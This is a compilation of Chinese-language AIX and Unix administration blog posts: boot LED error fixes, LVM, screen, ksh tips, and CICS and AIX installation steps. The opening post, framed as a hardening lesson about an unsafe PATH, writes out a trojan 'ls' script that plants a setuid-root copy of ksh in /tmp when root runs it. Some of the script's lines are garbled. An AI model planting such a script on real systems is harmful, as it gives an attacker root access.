骗取root的使用权

最近上课介绍AIX的安全性，竟然先听到一个如何骗取root帐号的方法，觉得有趣，写出来同大家一起研究，以便加强系统的安全性，当然仁者见仁，智者见智....
这个方法的前提条件是系统路径设置有问题：
一般情况下
PATH=/usr/bin:/etc:/usr/sbin:/sbin:.
而若是设置为
PATH=.:/usr/bin:/etc:/usr/sbin:/sbin
则非常不安全，这是因为此时输入命令系统会首先查找当前目录然后再查询其他目录，这就给黑客创建了很危险的机会：用自己编写同系统命令相同名称脚本来迷惑root用户。

$ cd /home/hacker                     
$ vi ls                              #创建ls文件
#!/usr/bin/ksh
cp /usr/bin/ksh  /tmp/.hackerchown   #拷贝ksh以便以后使用
chmod root /tmp/.hacker              #赋予拷贝后的文件root权限
chmod u+s /tmp/.hacker               #使拷贝后的文件运行是以文件所属(root)权限运行
rm -f $0                             #强制删除此假ls文件
/usr/bin/ls $*                       #将输入的参数传入的系统ls命令。

$ chmod a+x ls                       #赋予此ls文件可运行的属性

然后就是看你怎么欺骗root用户在当前目录下运行此文件了。
若是root用户在你的当前目录下运行了ls命令，那么当你运行/tmp/.hacker命令就可以重启一个ksh，而这个ksh则是拥有root权限的shell了，至此你想做什么都可以了....

正常umount不掉文件系统的处理步骤

短剧剧名：《正常umount不掉文件系统的处理步骤- 之粗俗不堪版》



导演＋编剧 ： workaholic



场地＋灯光＋音乐 ： larryh （借larryh是楼主，固有此说）



友情主演： 工程师甲（以下简称甲） & 工程师乙（以下简称乙）



剧情背景：



某日，工程师乙无法umount一个FS，提示 …………what what is busy 之类



演出开始：



乙： “faint ，该死的FS无法umount ” （气急败坏的表情）“

甲： “哦，肯定有哪个bitch开的Application用了该FS中的资源” （叼着香烟看着电影）

乙： “ 那TMD咋整啊” （还不到咱们LU发帖子）

甲： “ fuck ，应用都停了吧！” （也很气愤的说）

乙： “ shit，是啊” ( shit = 上海IT ？)

甲： “ 唉，看来只能 fuck user了 ” （语重心长的说）

乙： “ how ? " （一脸狐疑）

甲： “听着，要fuck 和 该 FS相关的USER，fuck user -> fuser -uck /mount_point ” （真正的技术要点分析阐述）

乙： “ 啊？能行吗，我来试试 ”



乙接着敲命令 ＃ fuser -uck /mount_point , 然后umount 搞定 。



甲继续看电影，乙继续干活，从此记住该参数 。

再见 Gaim

很久以前就在linux、windows上断断续续的使用过Gaim。一年前从Redhat 4开始正式开始使用Gaim，由于他集成了Gtalk、QQ、msn这三个我经常使用的聊天工具。所以即使在有时通过代理不能使用的情况下，我也依然不忍心放弃她。现在在Windows下也同样喜欢她节俭和整合的思维方式。

本想等待到Gaim的2.0 正式版，没想到这永远成为梦想。Gaim迫于AOL的压力，发布了Important and Long Delayed News从此将Gaim修改为pidgin，英文意思为混杂，语言或事务。

AIX故障解决方法

LED 201故障的解决





环境 产品: AIX

平台: RS

机型: RS6000

软件版本: V4

问题 系统无法正常启动，液晶面板LED显示201.



解答 LED 201通常由引导镜像损坏引起.应检查 /and/tmp 文件系统.

解决LED 201的具体步骤:

1.键入: lslv -m hd5 来确定引导盘;

2.键入: bostboot -a -d /dev/hdiskn 来重建引导镜像;

3.关机并重新启动系统.





LED 223-229故障的解决



环境 产品: AIX

平台: RS

机型: RS6000

软件版本: V4

问题 统无法正常启动，液晶面板LED显示223-229.

解答 LED 223-229通常由非法引导列表顺序引起.应启动机器进入维护服务模式(对于较旧的微通道式机器,应将钥匙拧至维护模式后启动系统),更改引导列表顺序后,关机并重新启动系统.





LED 553故障的解决



环境 产品: AIX

平台: RS

机型: RS6000

软件版本: V4

问题 系统无法正常启动，液晶面板LED显示553.

解答 LED 553通常是由于/etc/inittab文件系统被破坏引起的.应检查并修正这些遭到破坏的文件系统.

具体步骤:

1.启动,进入维护模式;



2.用df命令检查根目录下,/var目录下和/tmp目录下的剩余空间;



3.检查/etc/inittab文件,并修正inittab文件的错误;



4.检查执行错误;

/etc/environment

/bin/bsh

/bin/fsck



5.重新启动系统.





LED 551,555和557故障的解决





环境 产品: AIX

平台: RS

机型: RS6000

软件版本: V4

问题 系统无法正常启动，液晶面板LED显示551,555或557.



解答 LED 551,555,557通常由文件系统被破坏或JFS日志被破坏引起.应检查并修正这些遭到破坏的文件系统.

具体步骤:

1.检查文件系统;

fsck -y /dev/hd1

fsck -y /dev/hd2

fsck -y /dev/hd3

fsck -y /dev/hd4

fsck -y /dev/hd9var



2.重建JFS日志;

/usr/sbin/logform /dev/hd8



3.键入 lslv -m hd5 来确定引导盘;



4.重建引导镜像bosboot -a -d /dev/hdiskn;



5.重新启动系统.





LED 552,554和556故障的解决





环境 产品: AIX

平台: RS

机型: RS6000

软件版本: V4

问题 系统无法正常启动，液晶面板LED显示552,554或556



解答 LED 552,554,556通常由超级块(Super Block)被破坏或定制的ODM数据库被破坏引起.应检查并修正这些遭到破坏的文件系统.

具体步骤:

1.用备份的超级块(Super Block)替换被破坏超级块(Super Block),重建文件系统;

dd count=1 bs=4k skip=31 seek=1 if=/dev/hdn of=/dev/hdn

/usr/sbin/logform /dev/hd8



2.加载(Mount)根文件系统和用户文件系统;

mount /dev/hd4 /mnt

mount /usr



3.将系统配置拷贝到备份目录;

mkdir /mnt/etc/objrepors/backup

cp /mnt/etc/objrepors/Cu* /mnt/etc/objrepos



4.从RAM文件系统复制出系统配置;

cp /etc/objrepos/Cu* /mnt/etc/objrepos



5.卸载(Unmount)所有的文件系统;



6.确定引导盘;

lslv -m hd5 command.



7.保存新的ODM到根逻辑卷;

savebase -d/dev/hdiskn



8.重新启动系统.



如果系统仍无法正常启动,亦可重装BOS.



如何替换损坏的镜像卷组硬盘?





LED 0C31的问题

安装系统时停止在LED 0C31的问题

环境:(产品,平台,机型,软件版本,等)



问题描述:

在通过光盘或磁带启动试图安装操作系统时，计算机启动停止在LED 0C31，控制台上没有显示。



解答:

出现这种问题有两种可能：

1、使用其它计算机上创建的mksysb磁带启动安装，而其它计算机上原来安装的系统中不包含本计算机的显示卡驱动程序；

2、使用AIX安装光盘启动，AIX安装光盘版本太老，不 包含本计算机的显示卡驱动程序。

对于第一种问题，可以用和mksysb同样版本的AIX安装光盘启动，在选择控制台后，在下面的界面中选择3：



然后在下面的界面中选择4：





从磁带进行安装即可。

对于第二种情况，您需要从IBM获取更新版本的AIX安装光盘以支持计算机上的显示卡。





LED  0c0

The  dump was  successful

 

AIX经典之LVM

初时接触AIX被他丑陋的CDE(图形界面),笨拙的ksh(shell)搞的一塌糊涂，让我郁闷了好久。现在依然不喜欢他的图形界面，但是当真正在项目中使用后，发现用图形界面的可能性和机会少的可怜。也许这就是服务器和个人pc的最大区别吧 :D

LVM是AIX的最大特性之一，LVM是Logical Voume Manager的简写，直译就是逻辑卷管理器。

LVM最主要的功能就是能动态的，随时的分配磁盘分区空间。我们用不恰当但是直观的方法来了解(注意，这只是比喻)：譬如我们在windows里的C盘，当我们觉得C盘空间不够的时候，我们可以直接通LVM来动态的增加它的空间。当这个应用继续下去，我们会发现C盘的大小很动态，只是局限于一个硬盘的大小。LVM又有他的解决方法，将所有的物理硬盘组合起来，成为一个逻辑的硬盘，一个逻辑卷。这使得C盘的大小不在局限于一个硬盘的大小，而是逻辑硬盘(逻辑卷)的大小，而逻辑硬盘(逻辑卷)的大小也是可以动态的通过增加删除物理硬盘的来实现。

可以想象在服务其中这个功能多么的诱人，你可以不断电的添加硬盘，然后给任意分区添加或者减少空间。That Cool!~~~

实际上现在除了AIX也有很多linux(windows 2000好像也有卷的概念和类似功能，但是好像功能没有那么灵活，或者说我不了解 :P )支持LVM，我知道的就有suse，redhat。但是到底谁先有这么有趣的想法的就不知道了.

怎么使用无参数的sar

无参数的sar经常会报出如下的错误信息：

sar: 0551-201 Cannot open /var/adm/sa/sa22.

查阅文档发现，如果要使用不带参数的sar命令，必须首先让操作系统自动收集活动数据才能运行。/var/admin/sa/sadd中的dd实际为当前的日期。

打开这种收集的方法是编辑adm用户的crontab，修改其中的sa1的内容，使其定时运行。

Unix/Linux 工具: Screen 命令使用

screen your screen
文：林思敬
電子郵件：becks.lin@ec-base.com

前言
screen 是什么

根据其man介绍，screen是个多元化多功能的全屏窗口管理器，每个虚拟终端都可以为你提供DEC VT100 terminal的功能, 也许你会问:DEC VT100 terminal又是什么?如果你登陆过某些字符界面的BBS,或许你会记得在注册时，其要求你输入你的终端机型别，而一般预设就是我们刚刚提到的DEC VT100 termina了.另外screen还附加提供了比如SO 6429 (ECMA 48, ANSI X3.64) and ISO 2022 standards的操作功能.

screen 可以做些什么
如果在以前或许screen 是你登陆 bbs 站的好伴侣,但是相信现在大家都是直接登陆图形界面的也就是WEB界面的BBS.当你正在登陆多个BBS而又不想在多个窗口之间切换.那么screen就可以帮你的忙了。

当然screen可不是专为BBS服务, 它可以让你只需要打开一个终端窗口就可以地处理很多的(进程)事情,举个例子:你正在shell上编写某个程序,碰巧你又需要重新启动某个服务,同时还要 FTP上传个大文件,这个时候就可以使用调用screen,只需要按下3个键就可以无须用鼠标在3个窗口间切换.又或者你使用PUTTY等工具登陆到服务 器,不想在退出时关闭当前的进程,比如你正在复制文件等.这个时候就可以利用screen让你复制文件这个前台进程享受后台进程的"待遇"。

正是因为screen的种种实用功能 ,已经成为不少*unix玩家的必备利器,让*unix的日常操作管理更加方便。

screen使用
使用screen非常简易.只需在SHELL键入screen,便可打开一个screen session。
而在每个screen session 下，所有命令都以 ctrl+a(C-a) 开始。

现在让我来简单介绍基本的命令

C-a c -> Create，开启新的 window
C-a n -> Next，切换到下个 window
C-a p -> Previous，前一个 window
C-a C-a -> Other，在两个 window 间切换
C-a w -> Windows，列出已开启的 windows 有那些
C-a 0 -> 切换到第 0 个 window
C-a 1..9 -> 切换到第 1..9 个window

C-a a -> 发出 C-a，在 emacs, ve, bash, tcsh 下可移到行首

C-a t -> Time，显示当前时间，和系统的 load
C-a K(大写) -> kill window，强行关闭当前的 window

C-a [ -> 进入 copy mode，在 copy mode 下可以回滚、搜索、
复制就像用使用 vi 一样

C-b Backward，PageUp
C-f Forward，PageDown
H(大写) High，将光标移至左上角
L Low，将光标移至左下角
0 移到行首
$ 行末
w forward one word，以字为单位往前移
b backward one word，以字为单位往后移
Space 第一次按为标记区起点，第二次按为终点
Esc 结束 copy mode
C-a ] -> Paste，把刚刚在 copy mode 选定的内容贴上

C-a ? -> Help，显示简单说明

C-a d -> detach，将目前的 screen session (可能含有多个 windows)
丢到后台执行 当按了 C-a d 把 screen session detach 掉后，会回到还没进 screen 时的状态，此时在 screen session 里每个 window 内运行的 process (无论是前台/后台)都在继续执行，即使 logout 也不影响。

下次 login 进来时:

screen -ls -> 显示所有的 screen sessions
screen -r [keyword] -> 选择一个screen session 恢复对话

若 screen -ls 里有 Attached sessions:
screen -d [keyword] -> 强制 detach，以便「接手」过来

实例
说明看了那么多,让我们用一个实际例子来结束我们今天的学习。

在我们开启一个screen后,然后使用joe编辑一个文件,之后因为临时需要离开这时就可以运行Ctrl+a d,显示如下：

[becks@ec-base becks]$ screen
[detached]

这个时候当我们运行ps -e 可以看到pts/2这个我刚刚运行的screen正在运行joe
6264 pts/2 00:00:00 bash
6354 pts/2 00:00:00 joe

而当我们回来后想恢复这个session,只需要键入screen -r,而当你有多个session时候,系统将提示你选择一个,如下：
[becks@ec-base becks]$ screen -r
There are several suitable screens on:
6263.pts-1.ec-base (Detached)
6382.pts-1.ec-base (Detached)
Type "screen [-d] -r [pid.]tty.host" to resume one of them.

输入该session的pid进行恢复
[becks@becks becks]$ screen -r 6263

想退出screen的session,和退出shell一样,只需要键入exit命令,成功退出后将有以下提示
[screen is terminating]

screen的简单用法就介绍到这里,更多的功能和应有请读者参考MAN自行研究.

Ksh in AIX

一个朋友昨天听说我在学习一些AIX的操作,问了些问题:譬如怎么才能将AIX的shell改为bash,因为Ksh无法删除写错的字符和没有历史记录,且不能用"Tab"key 来做自动不全.

我也有过同样的想法,而且当时就想方设法找途径.

可惜最近的学习,也让我发现有些功能其实是我习惯了Bash(或是windows的)的原因,因为虽然我还没有发现是否Ksh支持自动不全,但是他却是可以删除出错的字符,而且也有历史记录.

以前老是在删除字符时显示:

^?

其实这是由于键盘映射为ACSII 127的问题,也就是Ctrl+? ,若是遇到这种情况:直接用Ctrl+H会更方便或快捷的删除输入错误的字符.或修改映射Ctrl+H

至于我们常用上下键来寻找以前的输入也常常出错,相对应的解决方法:

#set -o vi

然后在输入ESC后(不会有任何显示)在按"K"键"J"键就有上下键的功能.

实际上这是讲命令行的输入方式调试成和vi编辑器类似的方式,在这里同样可以使用"/"来查找以前输入过的command.这样看来,有些地方还是咱没有学通的原因.呵呵

CICS INSTALL ON AIX

准备安装

设置用于CICS区域和文件管理安装的文件系统

按照顺序(Why?)建立以下JFS,cics安装好后会直接这些目录,建立cics

/var/cics_regions

/var/cics_servers

/var/cics_servers/backups(我未操作)

/var/cics_servers/archives(我未操作)

# smitty crjfs 制作快捷创建,Jae告知:最好先建lv,然后再在上面建立jfs

Add a Journaled File System Move cursor to desired item and press Enter. Add a Standard Journaled File System Add a Compressed Journaled File System Add a Large File Enabled Journaled File System F1=Help F2=Refresh F3=Cancel Esc+8=Image Esc+9=Shell Esc+0=Exit Enter=Do

回车后选择需要的卷组再回车

Add a Standard Journaled File System Type or select values in entry fields. Press Enter AFTER making all desired changes. [Entry Fields] Volume group name rootvg SIZE of file system Unit Size Megabytes + * Number of units [1] # * MOUNT POINT [/var/cics_regions] Mount AUTOMATICALLY at system restart? yes + PERMISSIONS read/write + Mount OPTIONS [] + Start Disk Accounting? no + Fragment Size (bytes) 4096 + Number of bytes per inode 4096 + Allocation Group Size (MBytes) 8 + Logical Volume for Log + F1=Help F2=Refresh F3=Cancel F4=List Esc+5=Reset Esc+6=Command Esc+7=Edit Esc+8=Image Esc+9=Shell Esc+0=Exit Enter=Do

创建成功后显示

COMMAND STATUS Command: OK stdout: yes stderr: no Before command completion, additional instructions may appear below. Based on the parameters chosen, the new /var/cics_regions JFS file system is limited to a maximum size of 134217728 (512 byte blocks) New File System size is 32768 F1=Help F2=Refresh F3=Cancel Esc+6=Command Esc+8=Image Esc+9=Shell Esc+0=Exit /=Find n=Find Next

cics_servers jfs 创建同上.

# mount /var/cics_regions

# mount /var/cics_regions

创建CICS用户和组

组:

> cics

> cicsterm

mkgroup [组名称] or

# smitty mkgroup

Add a Group Type or select values in entry fields. Press Enter AFTER making all desired changes. [Entry Fields] * Group NAME [cics] ADMINISTRATIVE group? false + Group ID [] # USER list [root] + ADMINISTRATOR list [root] + Projects [] + F1=Help F2=Refresh F3=Cancel F4=List Esc+5=Reset Esc+6=Command Esc+7=Edit Esc+8=Image Esc+9=Shell Esc+0=Exit Enter=Do

创建成功后
:

COMMAND STATUS Command: OK stdout: no stderr: no Before command completion, additional instructions may appear below. F1=Help F2=Refresh F3=Cancel Esc+6=Command Esc+8=Image Esc+9=Shell Esc+0=Exit /=Find n=Find Next

cicstem创建同上.

用户:

> cics

> SFS_SERV

mkuser [用户名] or

smitty mkuser

# smitty mkuser

Add a User Type or select values in entry fields. Press Enter AFTER making all desired changes. [TOP] [Entry Fields] * User NAME [cics] User ID [] # ADMINISTRATIVE USER? false + Primary GROUP [cics] + Group SET [cics,cicsterm] + ADMINISTRATIVE GROUPS [cics,cicsterm] + ROLES [] + Another user can SU TO USER? true + SU GROUPS [ALL] + HOME directory [] Initial PROGRAM [] User INFORMATION [] ……. [MORE...38] F1=Help F2=Refresh F3=Cancel F4=List Esc+5=Reset Esc+6=Command Esc+7=Edit Esc+8=Image Esc+9=Shell Esc+0=Exit Enter=Do

成功后:

COMMAND STATUS Command: OK stdout: no stderr: no Before command completion, additional instructions may appear below. F1=Help F2=Refresh F3=Cancel Esc+6=Command Esc+8=Image Esc+9=Shell Esc+0=Exit /=Find n=Find Next

SFS_SERV用户创建同上.

将root用户指定为CICS系统管理员

将root用户添加到cics 和 cicsterm群组中.

# smitty chgroup

Change Group Attributes Type or select values in entry fields. Press Enter AFTER making all desired changes. [Entry Fields] Group NAME [cics] Group ID [215] # ADMINISTRATIVE group? false + USER list [cics,SFS_SERV,root] + ADMINISTRATOR list [SFS_SERV,cics,root] + Projects [] + F1=Help F2=Refresh F3=Cancel F4=List Esc+5=Reset Esc+6=Command Esc+7=Edit Esc+8=Image Esc+9=Shell Esc+0=Exit Enter=Do

cicsterm修改同上

设置环境变量

/etc/environment

$LANG

> en_US

> 语言环境

$PATH

> /usr/lpp/cics/bin:/usr/lpp/encina/bin

> 添加cics和encina的bin目录

$NLSPATH

> usr/lib/nls/msg/%L/%N:/usr/lib/nls/msg/%L/%N.cat:/usr/lib/nls/msg/en_US/%N:/usr/lpp/dce/lib/nls/msg/%L/%N

> 用来确定环境变数NLSPATH与LC_MESSAGES ( 如果 LC_MESSAGE 不存在则使用LANG )用来指定讯息的语言种类

$ENCINA_BINDING_FILE

>bind SFS 文件

参考:

# @(#)18 1.25 src/bos/etc/environment/environment, cmdsh, # bos53A, a2004_35B6 8/23/04 04:13:11 # IBM_PROLOG_BEGIN_TAG # This is an automatically generated prolog. # ..... # disclosure restricted by GSA ADP Schedule Contract with IBM Corp. #...... PATH=/usr/bin:/etc:/usr/sbin:/usr/ucb:/usr/bin/X11:/sbin:/usr/java14/jre/bin:/us r/java14/bin:/usr/lpp/cics/bin:/usr/lpp/encina/bin TZ=CST6CDT LANG=en_US LOCPATH=/usr/lib/nls/loc NLSPATH=/usr/lib/nls/msg/%L/%N RPC_SUPPORTED_PROTSEQS=ncadg_ip_udp ENCINA_BINDING_FILE=/var/cics_servers/server_bindings DCE_USE_WCHAR_NAMES=1

安装CICS

smitty install_update or

smitty installp

# smitty installp

Install and Update Software Move cursor to desired item and press Enter. Install Software Update Installed Software to Latest Level (Update All) Install Software Bundle Update Software by Fix (APAR) Install and Update from ALL Available Software F1=Help F2=Refresh F3=Cancel Esc+8=Image Esc+9=Shell Esc+0=Exit Enter=Do

在提示中输入安装介质目录:cdrom为:/dev/cd0.或者指定安装目录.

Install Software Type or select a value for the entry field. Press Enter AFTER making all desired changes. [Entry Fields] * INPUT device / directory for software [] + F1=Help F2=Refresh F3=Cancel F4=List Esc+5=Reset Esc+6=Command Esc+7=Edit Esc+8=Image Esc+9=Shell Esc+0=Exit Enter=Do

Install Software Type or select values in entry fields. Press Enter AFTER making all desired changes. [Entry Fields] * INPUT device / directory for software . * SOFTWARE to install [cics.base > + PREVIEW only? (install operation will NOT occur) no + COMMIT software updates? yes + SAVE replaced files? no + AUTOMATICALLY install requisite software? yes + EXTEND file systems if space needed? yes + OVERWRITE same or newer versions? no + VERIFY install and check file sizes? no + Include corresponding LANGUAGE filesets? yes + DETAILED output? no + Process multiple volumes? yes + ACCEPT new license agreements? yes + Preview new LICENSE agreements? no + F1=Help F2=Refresh F3=Cancel F4=List Esc+5=Reset Esc+6=Command Esc+7=Edit Esc+8=Image Esc+9=Shell Esc+0=Exit Enter=Do

检验:

lslpp –l “cics.*”

lslpp –l “encina.*”

后期配置

为CICS配置DCE(我还未熟悉)

配置仅RPC环境

/usr/lpp/dce/bin/lsdce

正确为:

h50:/ptfs/CICS51/CICSINSTALL# lsdce Gathering component state information... Component Summary for Host: [your host] Component Configuration State RPC Configured The component summary is complete.

若有其他服务用以下命令除去

# /usr/lpp/dce/bin/dce.clean # /usr/lpp/dce/bin/rmdce all

输入下列命令，在机器上配置 DCE RPC 服务：

# /usr/lpp/cics/bin/cicscp -v -l log_file create dce -R

添加环境变量(我还未熟悉)

在/etc/environment文件里添加新的参数用来支持些DCE的东东.

CICS_HOSTS=’ hostA hostB hostC’

RPC_SUPPORTED_PROTSEQS=ncadg_ip_udp(好像是要使用的协议)

配置文件管理器和CICS区域

创建log_SFS_SERV & sfs_SFS_SERV 逻辑卷

# smitty mklv

Add a Logical Volume Type or select values in entry fields. Press Enter AFTER making all desired changes. [TOP] [Entry Fields] Logical volume NAME [log_SFS_SERV] * VOLUME GROUP name datavg * Number of LOGICAL PARTITIONS [1] # ................................................................. Mirror Write Consistency? active + Allocate each logical partition copy yes + [MORE...12] F1=Help F2=Refresh F3=Cancel F4=List Esc+5=Reset Esc+6=Command Esc+7=Edit Esc+8=Image Esc+9=Shell Esc+0=Exit Enter=Do

为log_SFS_SERV & sfs_SFS_SERV设置权限:

# chown SFS_SERV:cics *SFS*

检验:

# ls -l /dev/ |grep SFS brw-rw---- 1 SFS_SERV cics 42, 20 Jan 15 11:12 log_SFS_SERV crw-rw---- 1 SFS_SERV cics 42, 20 Jan 15 11:12 rlog_SFS_SERV crw-rw---- 1 SFS_SERV cics 42, 21 Jan 15 11:12 rsfs_SFS_SERV brw-rw---- 1 SFS_SERV cics 42, 21 Jan 15 11:12 sfs_SFS_SERV

运行cicsdefaultservers（我反正老是忘记）

cicsdefaultservers会建立创建 SFS 服务器、DB2 数据库或对等通信（PPC）网关服务器时 CICS 使用的信息:

* /var/cics_servers/SSD/SSD.stanza，它包含结构化文件服务器定义（SSD）

* /var/cics_servers/SCD/SCD.stanza，它包含模式文件服务器定义（SCD）

* /var/cics_servers/GSD/GSD.stanza，它包含网关服务器定义（GSD）

创建并修改server_bindings文件

/.:/cics/sfs/$HOSTNAME ncadg_ip_udp:$host_ip[$sfs_port]

$host_ip可省略，尤其是对多IP的情况下

创建SFS server

cicscp create sfs_server OR

smitty cics

# smitty cics

Customer Information Control System (CICS) Version 5.0 Move cursor to desired item and press Enter. Manage CICS Regions Manage Encina PPC Gateway Servers Manage Filesystem F1=Help F2=Refresh F3=Cancel Esc+8=Image Esc+9=Shell Esc+0=Exit Enter=Do

Manage Filesystem Move cursor to desired item and press Enter. Manage Encina SFS Servers Manage Schemas F1=Help F2=Refresh F3=Cancel Esc+8=Image Esc+9=Shell Esc+0=Exit Enter=Do

Manage Encina SFS Servers Move cursor to desired item and press Enter. Change Working Encina SFS Server Cold Start an Encina SFS Server Auto Start an Encina SFS Server Shutdown an Encina SFS Server Define Encina SFS Servers F1=Help F2=Refresh F3=Cancel Esc+8=Image Esc+9=Shell Esc+0=Exit Enter=Do

Define Encina SFS Servers Move cursor to desired item and press Enter. Create Destroy Show/Change F1=Help F2=Refresh F3=Cancel Esc+8=Image Esc+9=Shell Esc+0=Exit Enter=Do

修改一些设置.其中可以见到为什么前面构建SFS_SERV用户和sfs_SFS_SERV & log_SFS_SERVER 逻辑卷回车后即可

Create Encina SFS Server Type or select values in entry fields. Press Enter AFTER making all desired changes. [TOP] [Entry Fields] * SFS Server Identifier [SFS] * Model SFS Server Identifier "" Ignore errors on creation? no + Are you using DCE servers? no + Resource description [SFS Server Definition] ...... Short name used for SRC [SFS_SERV] AIX user ID for server [%S] AIX logical volume for data [sfs_%S] AIX logical volume for logging [log_%S] Log File Name [logfile] Name Service for advertising server NONE + F1=Help F2=Refresh F3=Cancel F4=List Esc+5=Reset Esc+6=Command Esc+7=Edit Esc+8=Image Esc+9=Shell Esc+0=Exit Enter=Do

创建Region

cicscp -v create region region_name OR

smitty cics

# smitty cics

Customer Information Control System (CICS) Version 5.0 Move cursor to desired item and press Enter. Manage CICS Regions Manage Encina PPC Gateway Servers Manage Filesystem F1=Help F2=Refresh F3=Cancel Esc+8=Image Esc+9=Shell Esc+0=Exit Enter=Do

Manage CICS Regions Move cursor to desired item and press Enter. Change Working CICS Region Cold Start a CICS Region Auto Start a CICS Region Shutdown a CICS Region Define Resources for a CICS Region Configure CICS Resources on a File Server Create (Import) a CICS Region Save (Export) a CICS Region Copy a CICS Region Destroy a CICS Region F1=Help F2=Refresh F3=Cancel Esc+8=Image Esc+9=Shell Esc+0=Exit Enter=Do

Create (Import) a CICS Region Type or select values in entry fields. Press Enter AFTER making all desired changes. [Entry Fields] * Name of Region to be Created [REG] Action to be Taken for Resolving Links mandatory + Force redefinition of region? no + Group Id. for Region Data [] * Input file [/usr/lpp/cics/DEFAULT] / Force use or non-use of DCE servers? do not use DCE server> + F1=Help F2=Refresh F3=Cancel F4=List Esc+5=Reset Esc+6=Command Esc+7=Edit Esc+8=Image Esc+9=Shell Esc+0=Exit Enter=Do

配置Region 的文件系统:

先选择建立的Region

Manage CICS Regions Move cursor to desired item and press Enter. Change Working CICS Region Cold Start a CICS Region Auto Start a CICS Region Shutdown a CICS Region Define Resources for a CICS Region Configure CICS Resources on a File Server ..... F1=Help F2=Refresh F3=Cancel Esc+8=Image Esc+9=Shell Esc+0=Exit Enter=Do

选择正确后:

COMMAND STATUS Command: OK stdout: yes stderr: no Before command completion, additional instructions may appear below. REG F1=Help F2=Refresh F3=Cancel Esc+6=Command Esc+8=Image Esc+9=Shell Esc+0=Exit /=Find n=Find Next

f3或 ESC+3回退一步:

Manage CICS Regions Move cursor to desired item and press Enter. Change Working CICS Region Cold Start a CICS Region Auto Start a CICS Region Shutdown a CICS Region Define Resources for a CICS Region Configure CICS Resources on a File Server ..... F1=Help F2=Refresh F3=Cancel Esc+8=Image Esc+9=Shell Esc+0=Exit Enter=Do

Configure CICS Resources on a File Server Move cursor to desired item and press Enter. Configure CICS Resources on an Encina SFS Server Configure DB2 Database resources F1=Help F2=Refresh F3=Cancel Esc+8=Image Esc+9=Shell Esc+0=Exit Enter=Do

Configure CICS Resources on an Encina SFS Server Move cursor to desired item and press Enter. Configure an Encina SFS Server Configure an Encina SFS Server for Recoverable Auxiliary TSQs Configure an Encina SFS Server for Non-Recoverable Auxiliary TSQs Configure an Encina SFS Server for Logically Recoverable TDQs Configure an Encina SFS Server for Physically Recoverable TDQs Configure an Encina SFS Server for Non-Recoverable TDQs Configure an Encina SFS Server for Locally-Queued Protected STARTs Configure an Encina SFS Server for Locally-Queued Unprotected STARTs F1=Help F2=Refresh F3=Cancel Esc+8=Image Esc+9=Shell Esc+0=Exit Enter=Do

修改对应的SFS server,此时此SFS Data要求要启动

Configure Encina Servers Type or select values in entry fields. Press Enter AFTER making all desired changes. [TOP] [Entry Fields] * Region Name REG Ignore errors on configuration? no + Reset File Server to SFS? no + * Number of updates 2 SFS server or database storing CICS Queue Data [/.:/cics/sfs/SFS] Recoverable Auxiliary TSQ Volume Name sfs_%S Number of pages to preallocate for RecTSQFile 5 Maximum number of records for Recoverable Auxiliar 1000000 y TSQs Non-recoverable TSQ Volume Name sfs_%S Number of pages to preallocate for NonRecTSQFile 5 Maximum number of records for Non-recoverable TSQs 1000000 Logically Recoverable TDQ Volume Name sfs_%S [MORE...18] F1=Help F2=Refresh F3=Cancel F4=List Esc+5=Reset Esc+6=Command Esc+7=Edit Esc+8=Image Esc+9=Shell Esc+0=Exit Enter=Do

启动SFS和Region

cicscp –v start sfs_server [sfs服务名]

# cicscp –v start sfs_server /.:/cics/sfs/SFS

cicscp –v start region [region name]

# cicscp –v start region REG

查看运行状态
#lssrc -a|grep cics

IBM RS/6000 AIX操作系统的安装(转)

一、安装基本操作系统(BOS)

打开计算机或在开机状态下重新启动(#reboot)
将AIX安装盘放入光驱
当系统自检 keyboard 通过后,按"5"(从光驱引导)
系统提示：
Please define the system Console
后,按"1"(确认终端)
系统提示:
Type a "1" and press Enter to use this terminal as the system console
后按1(选择英语为安装语言)
进入安装程序,按系统提示操作:
选择“ 2 Chang/show Installation Settings and Install” 其它选项不需改变,只需改以下两项：
将安装方式改为“New and Complete Installation“
选择所要安装系统的disk
开始install。

二、设置终端类型(TTY)

结束安装后,第一次启动时,系统提示选择终端类型,应选择ibm3151
用"root"登录,接着出现系统设置(时间，密码等),直接退出即可
#export TERM=ibm3151（设置终端类型，否则无法进入smit）
#smit tty (设置终端类型，否则以后启动还会要求选择终端类型)
选择 chang/show characeristics of a TTY (修改)
修改 ENABLE LOGIN 为"enable"
修改 TERMINAL type 为ibm3151

三、 安装Bundle

#smit easy_install
选择 INPUT device / directory for software 为[/dev/cd0]（按F4选择）
选择 Select a FileSet Bundle 为 Server 及 App-Dev(有图形设备需选Graphics-Startup)

四、 选择安装软件

#smit
进入 Software Installation and Maintenance-〉Install and Update-〉 SoftwareInstall and Updata from LATEST Available Software
选择 INPUT device / directory for software 为[/dev/cd0](按F4选择)
进入 SOFTWARE to install选择所需安装的软件
开头有"@"符即已安装过
开头有"+"符即未安装过
如不装图形终端,则以"X11"开头的不装
以下必须装:
bos.compat (兼容AIX 3)
bos.data
bos.dosutil (dos utility)
有关info,msg的必须装

五、 设置TCP/IP

#lsdev -Cc adapter查看网卡设置(选择IBM 10/100 Mbps Ethernet PCI Adapter)
#smit tcpip
选择"Minimum Configuration & Startup"
在"Available Network Interfaces"对话框中选择 "en0 Standard Ethernet Network Interface"
注意:如有多块网卡,根据前面查看的设置,选择正确的网卡,一般不选"et0 IEEE 802.3 Ethernet Network Interface"
在HOSTNAME中填入所起的主机名(F50-CMIS).
在Internet ADDRESS (dotted decimal)设IP地址(16.54.2.7)
在 Network MASK (dotted decimal)设掩码(255.255.255.0)
在Default GATEWAY Address设网关
在Your CABLE Type选择"TP"
全部选定后按回车（Enter）运行

六、 设置VG（卷组）

#smit vg
选择 Add a Volume Group
设置Volume Grorp Name
设置Physical partition Size in megabytes(PP值，一般2.2G可设4，4.5G可设8，9.1G可设16)
设置Physical Volume Names(选择所需disk)
全部选定后按回车（Enter）运行

七、 设置LV（逻辑卷）

#smit lv
选择Add a Logical Volume
VOLUME GROUP name中选择VG name
Logical volume NAME中填入所起的LV 的名字
Number of LOGICAL PARTITIONS中填入LV大小(这里的数量为Logical Partition数量,一块LP缺省值等于一块PP)
全部选定后按回车（Enter）运行

八、 设置File Systems

#smit
进入 System Storage Management (Physical & Logical Storage)->File Systems->Add/Chang/Show/Delete File Systems->Journaled File System->Add Journaled File System
修改本文件系统块数(Size of File System)，一块为512 Bytes
修改Mount Point(为文件系统指定PATHS,如[/oracle])
决定是否在系统启动时自动Mount该文件系统
全部选定后按回车（Enter）运行

九、 安装C及C++语言

